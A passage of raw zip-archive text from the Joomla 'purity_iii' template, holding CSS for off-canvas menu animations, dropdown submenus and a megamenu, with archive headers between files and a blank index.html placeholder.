  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  left: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  right: -250px;
  left: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #bbe6ff;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  left: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #0067a2;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-left: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 0 0 12px;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  right: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #0077bb;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #00466e;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}PKӜ�\��VpTT$purity_iii/css/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}PKӜ�\�#o,,purity_iii/css/index.htmlnu&1i�<html><body bgcolor="#FFFFFF"></body></html>PKӜ�\Ic�p7p7purity_iii/css/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-left: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-left: -5px;
  margin-right: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-right: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  left: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  left: auto;
  right: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  left: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  left: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  left: auto;
  right: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  left: 0;
  margin-left: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-left: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-left: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-left: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    display: table;
    content: " ";
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    left: 0 !important;
    margin-left: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    left: auto;
    right: 0 !important;
    margin-right: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-left: auto;
  margin-right: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
